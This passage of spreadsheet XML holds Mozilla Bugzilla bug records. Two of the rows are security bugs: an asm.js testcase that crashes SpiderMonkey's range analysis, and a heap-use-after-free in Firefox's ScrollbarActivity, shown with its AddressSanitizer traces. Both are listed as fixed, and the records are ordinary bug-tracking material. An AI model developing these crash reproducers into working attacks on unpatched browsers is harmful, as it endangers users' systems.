        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4108" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4108" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4108" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4108" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][adv-main64+][adv-esr60.4+]</t>
        </is>
      </c>
      <c r="Q4108" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4108" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4108" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T4108" t="n">
        <v>1</v>
      </c>
      <c r="U4108" t="n">
        <v>0</v>
      </c>
      <c r="V4108" t="n">
        <v>21</v>
      </c>
      <c r="W4108" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7007206a3cd4 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --ion-check-range-analysis --ion-offthread-compile=off):
function AsmModule() {
    "use asm";      
    function f3(x,y){
        x = x|0;
        y = +y;
        var n = 10;
        a: while( (x|0) &lt; 30 ) x = (x+(2147483647))|0
        do {
             x = (x+1)|0;
             n = (n + 1)|0;
        } while((n|0) &lt; 100)
    }
    function bar(k,d) {
        k = k|0;
        d = +d;
    }
    return {bar:bar,f3:f3}
}
var obj = AsmModule();
print(obj.f3(1,1.5))
Backtrace:
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x00001b18d65360a4 in ?? ()
#1  0x0000000000000000 in ?? ()
rax	0xc	12
rbx	0x7fb44092c880	140412154202240
rcx	0x64	100
rdx	0x120	288
rsi	0x7fb43f21dbe0	140412130024416
rdi	0x80000000	2147483648
rbp	0x7fff21e93e18	140733762321944
rsp	0x7fff21e93e18	140733762321944
r8	0x0	0
r9	0x0	0
r10	0x7fff21e93f58	140733762322264
r11	0x1	1
r12	0x7fff21e93e48	140733762321992
r13	0x7fb440918000	140412154118144
r14	0x7fb43f21dbe0	140412130024416
r15	0x0	0
rip	0x1b18d65360a4	29793488953508
=&gt; 0x1b18d65360a4:	cmpl   $0x0,0x30(%r14)
   0x1b18d65360a9:	je     0x1b18d65360b1
S-s because this is likely an asm.js range analysis problem.</t>
        </is>
      </c>
      <c r="X4108" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4109">
      <c r="A4109" t="n">
        <v>723575</v>
      </c>
      <c r="B4109" t="inlineStr">
        <is>
          <t>2012-02-02 09:33:38 -0800</t>
        </is>
      </c>
      <c r="C4109" t="inlineStr">
        <is>
          <t>Article helpfulness graphs =&gt; unresponsive scripts</t>
        </is>
      </c>
      <c r="D4109" t="inlineStr">
        <is>
          <t>2012-02-14 10:18:27 -0800</t>
        </is>
      </c>
      <c r="E4109" t="n">
        <v>1</v>
      </c>
      <c r="F4109" t="n">
        <v>1</v>
      </c>
      <c r="G4109" t="n">
        <v>5</v>
      </c>
      <c r="H4109" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4109" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4109" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4109" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4109" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4109" t="inlineStr"/>
      <c r="Q4109" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4109" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4109" t="inlineStr">
        <is>
          <t>2012-02-14</t>
        </is>
      </c>
      <c r="T4109" t="n">
        <v>1</v>
      </c>
      <c r="U4109" t="n">
        <v>0</v>
      </c>
      <c r="V4109" t="n">
        <v>9</v>
      </c>
      <c r="W4109" t="inlineStr">
        <is>
          <t>I am not sure if this is related to me updating highcharts/stockcharts or something else is going on?</t>
        </is>
      </c>
      <c r="X4109" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4110">
      <c r="A4110" t="n">
        <v>514611</v>
      </c>
      <c r="B4110" t="inlineStr">
        <is>
          <t>2009-09-03 22:06:32 -0700</t>
        </is>
      </c>
      <c r="C4110" t="inlineStr">
        <is>
          <t>Set up extra capacity for 0.8 release</t>
        </is>
      </c>
      <c r="D4110" t="inlineStr">
        <is>
          <t>2023-03-27 08:12:51 -0700</t>
        </is>
      </c>
      <c r="E4110" t="n">
        <v>1</v>
      </c>
      <c r="F4110" t="n">
        <v>1</v>
      </c>
      <c r="G4110" t="n">
        <v>6</v>
      </c>
      <c r="H4110" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4110" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J4110" t="inlineStr">
        <is>
          <t>Server: Sync</t>
        </is>
      </c>
      <c r="K4110" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4110" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4110" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4110" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4110" t="inlineStr">
        <is>
          <t>ETA 11/16/2009</t>
        </is>
      </c>
      <c r="Q4110" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4110" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4110" t="inlineStr">
        <is>
          <t>1.0 beta3</t>
        </is>
      </c>
      <c r="T4110" t="n">
        <v>1</v>
      </c>
      <c r="U4110" t="n">
        <v>0</v>
      </c>
      <c r="V4110" t="n">
        <v>11</v>
      </c>
      <c r="W4110" t="inlineStr">
        <is>
          <t>As discussed in the post-mortem meeting today, let's make sure we have some extra capacity lined up and ready to go to handle spikes for the 0.7 release.
Let's use this bug to track what hardware we have available in our hands, our plan for getting it installed and ready to go and how we plan to use it, if needed.
As a guiding number, 0.7 should handle at least 250K users comfortably.</t>
        </is>
      </c>
      <c r="X4110" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4111">
      <c r="A4111" t="n">
        <v>107718</v>
      </c>
      <c r="B4111" t="inlineStr">
        <is>
          <t>2001-10-30 23:20:57 -0800</t>
        </is>
      </c>
      <c r="C4111" t="inlineStr">
        <is>
          <t>masschange gives all changed bugs the groupset of the first bug in the list</t>
        </is>
      </c>
      <c r="D4111" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E4111" t="n">
        <v>1</v>
      </c>
      <c r="F4111" t="n">
        <v>1</v>
      </c>
      <c r="G4111" t="n">
        <v>4</v>
      </c>
      <c r="H4111" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4111" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4111" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4111" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4111" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4111" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4111" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4111" t="inlineStr"/>
      <c r="Q4111" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4111" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4111" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4111" t="n">
        <v>1</v>
      </c>
      <c r="U4111" t="n">
        <v>0</v>
      </c>
      <c r="V4111" t="n">
        <v>26</v>
      </c>
      <c r="W4111" t="inlineStr">
        <is>
          <t>myk, this should be considered for being a blocker for the b.m.o upgrade.
I noticed this happening once before, but just thought that the wrong button was
pushed.
If you do a mass change, then one of the options is to leave everything as it is
However, the code to handle this is run once, not once per bug (~ line 564 in
process_bug.cgi:
    } elsif ($::FORM{"bit-$b"} == -1) {
      # If we get here, the user came from the change several bugs form, and
      # said not to change this group restriction.  So we'll add this group
      # back in only if the bug already has it.
      if ($bughasgroup) {
        $::query .= " + $b";
      }
    }
For setting/clearing, this is OK, but not for keeping as is. I suspect (but its
late, and I haven't tested) that we just need to set groupset to groupset in the
init code, rather than 0, and then this branch of the if statements should then
be a noop. Removing a group (ie !$bughasgroup &amp;&amp; $::FORM{"bit-$b"} == 1) should
then just subtract the bit.</t>
        </is>
      </c>
      <c r="X4111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4112">
      <c r="A4112" t="n">
        <v>898871</v>
      </c>
      <c r="B4112" t="inlineStr">
        <is>
          <t>2013-07-28 08:33:35 -0700</t>
        </is>
      </c>
      <c r="C4112" t="inlineStr">
        <is>
          <t>ASAN heap-use-after-free in mozilla::layout::ScrollbarActivity</t>
        </is>
      </c>
      <c r="D4112" t="inlineStr">
        <is>
          <t>2019-12-09 16:02:44 -0800</t>
        </is>
      </c>
      <c r="E4112" t="n">
        <v>1</v>
      </c>
      <c r="F4112" t="n">
        <v>1</v>
      </c>
      <c r="G4112" t="n">
        <v>3</v>
      </c>
      <c r="H4112" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4112" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4112" t="inlineStr">
        <is>
          <t>Layout: Images, Video, and HTML Frames</t>
        </is>
      </c>
      <c r="K4112" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4112" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4112" t="inlineStr">
        <is>
          <t>[asan][adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q4112" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4112" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4112" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4112" t="n">
        <v>1</v>
      </c>
      <c r="U4112" t="n">
        <v>0</v>
      </c>
      <c r="V4112" t="n">
        <v>31</v>
      </c>
      <c r="W4112" t="inlineStr">
        <is>
          <t>Created attachment 782265
testcase.zip (crash.html crashes firefox)
The attached testcase crashes the firefox ASAN build with following ASAN output. The testcase is attached as a zip archive, as it requires several files.
================================================================
==45947==ERROR: AddressSanitizer: heap-use-after-free on address 0x625001110a98 at pc 0x7feca0144595 bp 0x7fffdd1e1ff0 sp 0x7fffdd1e1fe8
READ of size 8 at 0x625001110a98 thread T0
    #0 0x7feca0144594 in nsCOMPtr&lt;mozilla::layout::ScrollbarActivity&gt;::get() const /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/layout/generic/../../dist/include/nsCOMPtr.h:800:0
    #1 0x7feca0144594 in nsCOMPtr&lt;mozilla::layout::ScrollbarActivity&gt;::operator mozilla::layout::ScrollbarActivity*() const /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/layout/generic/../../dist/include/nsCOMPtr.h:813:0
    #2 0x7feca0144594 in nsGfxScrollFrameInner::SetCoordAttribute(nsIContent*, nsIAtom*, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:3861:0
    #3 0x7feca013bbb4 in nsGfxScrollFrameInner::UpdateScrollbarPosition() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:2941:0
    #4 0x7feca0136fbe in nsGfxScrollFrameInner::ScrollToImpl(nsPoint, nsRect const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:2012:0
    #5 0x7feca013886c in nsGfxScrollFrameInner::ScrollToWithOrigin(nsPoint, nsIScrollableFrame::ScrollMode, nsIAtom*, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:1651:0
    #6 0x7feca0028e0c in nsGfxScrollFrameInner::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.h:172:0
    #7 0x7feca0028e0c in nsHTMLScrollFrame::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.h:524:0
    #8 0x7feca0028e0c in non-virtual thunk to nsHTMLScrollFrame::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:4099:0
    #9 0x7feca0ef0f66 in mozilla::dom::ImageDocument::ScrollImageTo(int, int, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:379:0
    #10 0x7feca0ef07d1 in mozilla::dom::ImageDocument::ShrinkToFit() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:336:0
    #11 0x7feca0ef532b in mozilla::dom::ImageDocument::CheckOverflowing(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:636:0
    #12 0x7feca0ef4857 in mozilla::dom::ImageDocument::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:537:0
    #13 0x7feca0ef545c in non-virtual thunk to mozilla::dom::ImageDocument::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:565:0
    #14 0x7feca0a9d6a2 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventListenerManager.cpp:941:0
    #15 0x7feca0a9e3e8 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventListenerManager.cpp:1012:0
    #16 0x7feca0a90577 in nsEventTargetChainItem::CurrentTarget() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventListenerManager.h:328:0
    #17 0x7feca0a90577 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, ELMCreationDetector&amp;, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventDispatcher.cpp:221:0
    #18 0x7feca0a8f4f1 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, nsDispatchingCallback*, ELMCreationDetector&amp;, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventDispatcher.cpp:342:0
    #19 0x7feca0a93753 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventDispatcher.cpp:644:0
    #20 0x7fec9ff969ad in PresShell::FireResizeEvent() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:1956:0
    #21 0x7fec9ffa9fbc in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:3807:0
    #22 0x7fec9ff9a635 in PresShell::HandlePostedReflowCallbacks(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:3711:0
    #23 0x7fec9ff9a635 in PresShell::DidDoReflow(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:7663:0
    #24 0x7fec9ff97768 in PresShell::ResizeReflowIgnoreOverride(int, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:1885:0
    #25 0x7feca1229c1f in nsViewManager::DoSetWindowDimensions(int, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/view/src/nsViewManager.cpp:197:0
    #26 0x7feca1229c1f in nsViewManager::SetWindowDimensions(int, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/view/src/nsViewManager.cpp:217:0
    #27 0x7fec9ff1dbd7 in nsDocumentViewer::SetBounds(nsIntRect const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsDocumentViewer.cpp:1874:39
    #28 0x7fec9ff1dc67 in nsDocumentViewer::SetBounds(nsIntRect const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsDocumentViewer.cpp:1886:0
    #29 0x7feca1fd913a in nsDocShell::SetPositionAndSize(int, int, int, int, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/docshell/base/nsDocShell.cpp:5101:0
    #30 0x7feca1fd913a in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/docshell/base/nsDocShell.cpp:5105:0
    #31 0x7feca0822249 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsFrameLoader.cpp:1884:0
    #32 0x7feca0821d97 in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsFrameLoader.cpp:1858:0
    #33 0x7feca01eb7da in nsSubDocumentFrame::ReflowFinished() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsSubDocumentFrame.cpp:692:0
    #34 0x7feca01eb7da in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsSubDocumentFrame.cpp:701:0
    #35 0x7fec9ff9a5cf in PresShell::HandlePostedReflowCallbacks(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:3702:0
    #36 0x7fec9ff9a5cf in PresShell::DidDoReflow(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:7663:0
    #37 0x7fec9ffaaf6e in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:7996:0
    #38 0x7fec9ffaa708 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:3896:0
    #39 0x7feca07bcb88 in nsDocument::FlushPendingNotifications(mozFlushType) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsDocument.cpp:7087:0
    #40 0x7feca07bc98e in nsDocument::FlushPendingNotifications(mozFlushType) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsDocument.cpp:7065:0
    #41 0x7feca202fba5 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/uriloader/base/nsDocLoader.cpp:709:0
    #42 0x7feca203159a in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/uriloader/base/nsDocLoader.cpp:639:0
    #43 0x7feca2031e49 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/uriloader/base/nsDocLoader.cpp:642:0
    #44 0x7fec9f6b4176 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/netwerk/base/src/nsLoadGroup.cpp:684:0
    #45 0x7feca07c33aa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsDocument.cpp:7967:0
    #46 0x7feca07c2eaf in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsDocument.cpp:7895:0
    #47 0x7feca07a1492 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/nsDocument.cpp:4685:0
    #48 0x7feca07ea2ac in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/content/base/src/../../../dist/include/nsThreadUtils.h:350:0
    #49 0x7fec9f47e2ea in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/xpcom/threads/nsThread.cpp:621:0
    #50 0x7fec9f3a74f6 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238:0
    #51 0x7fec9e294011 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/ipc/glue/MessagePump.cpp:81:0
    #52 0x7fec9f5a6533 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/ipc/chromium/src/base/message_loop.cc:219:0
    #53 0x7fec9f5a6533 in MessageLoop::RunHandler() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/ipc/chromium/src/base/message_loop.cc:212:0
    #54 0x7fec9f5a6533 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/ipc/chromium/src/base/message_loop.cc:186:0
    #55 0x7feca27a8bec in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/widget/xpwidgets/nsBaseAppShell.cpp:163:0
    #56 0x7feca21c9abe in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/toolkit/components/startup/nsAppStartup.cpp:269:0
    #57 0x7fec9df31730 in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/toolkit/xre/nsAppRunner.cpp:3858:0
    #58 0x7fec9df32695 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/toolkit/xre/nsAppRunner.cpp:3926:0
    #59 0x7fec9df335cb in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/toolkit/xre/nsAppRunner.cpp:4128:0
    #60 0x459add in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/browser/app/nsBrowserApp.cpp:272:0
    #61 0x459add in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/browser/app/nsBrowserApp.cpp:632:0
    #62 0x7fecacadaea4 in ?? ??:0
    #63 0x458f5c in _start ??:?
0x625001110a98 is located 4504 bytes inside of 8192-byte region [0x62500110f900,0x625001111900)
freed by thread T0 here:
    #0 0x445e65 in __interceptor_free _asan_rtl_:0
    #1 0x7fecaa10f7e3 in FreeArenaList /builds/slave/m-cen-l64-asan-ntly-0000000000/build/nsprpub/lib/ds/plarena.c:273:0
    #2 0x7fecaa10f7e3 in PL_FinishArenaPool /builds/slave/m-cen-l64-asan-ntly-0000000000/build/nsprpub/lib/ds/plarena.c:313:0
    #3 0x7fec9ff8cdd8 in PresShell::~PresShell() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/base/nsPresShell.cpp:747:0
    #4 0x7feca23bf03e in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/editor/composer/src/nsEditingSession.cpp:332:0
    #5 0x7feca23bd390 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/editor/composer/src/nsEditingSession.cpp:168:0
    #6 0x7feca0f1acc9 in nsHTMLDocument::EditingStateChanged() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/nsHTMLDocument.cpp:2871:0
    #7 0x7feca0f36a7c in nsRunnableMethodImpl&lt;void (nsHTMLDocument::*)(), true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/content/html/document/src/../../../../dist/include/nsThreadUtils.h:350:0
    #8 0x7feca063dc6c in ~nsAutoScriptBlocker /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/content/base/src/../../../dist/include/nsContentUtils.h:2248:0
    #9 0x7feca063dc6c in ~nsAutoScriptBlocker /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/content/base/src/../../../dist/include/nsContentUtils.h:2247:0
    #10 0x7feca063dc6c in mozilla::dom::Element::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/base/src/Element.cpp:1629:0
    #11 0x7feca01444f1 in nsIContent::SetAttr(int, nsIAtom*, nsAString_internal const&amp;, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/layout/generic/../../dist/include/nsIContent.h:350:0
    #12 0x7feca01444f1 in nsGfxScrollFrameInner::SetCoordAttribute(nsIContent*, nsIAtom*, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:3859:0
    #13 0x7feca013bbb4 in nsGfxScrollFrameInner::UpdateScrollbarPosition() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:2941:0
    #14 0x7feca0136fbe in nsGfxScrollFrameInner::ScrollToImpl(nsPoint, nsRect const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:2012:0
    #15 0x7feca013886c in nsGfxScrollFrameInner::ScrollToWithOrigin(nsPoint, nsIScrollableFrame::ScrollMode, nsIAtom*, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:1651:0
    #16 0x7feca0028e0c in nsGfxScrollFrameInner::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.h:172:0
    #17 0x7feca0028e0c in nsHTMLScrollFrame::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.h:524:0
    #18 0x7feca0028e0c in non-virtual thunk to nsHTMLScrollFrame::ScrollTo(nsPoint, nsIScrollableFrame::ScrollMode, nsRect const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/layout/generic/nsGfxScrollFrame.cpp:4099:0
    #19 0x7feca0ef0f66 in mozilla::dom::ImageDocument::ScrollImageTo(int, int, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:379:0
    #20 0x7feca0ef07d1 in mozilla::dom::ImageDocument::ShrinkToFit() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:336:0
    #21 0x7feca0ef532b in mozilla::dom::ImageDocument::CheckOverflowing(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:636:0
    #22 0x7feca0ef545c in non-virtual thunk to mozilla::dom::ImageDocument::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/html/document/src/ImageDocument.cpp:565:0
    #23 0x7feca0a9e3e8 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventListenerManager.cpp:1012:0
    #24 0x7feca0a90577 in nsEventTargetChainItem::CurrentTarget() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventListenerManager.h:328:0
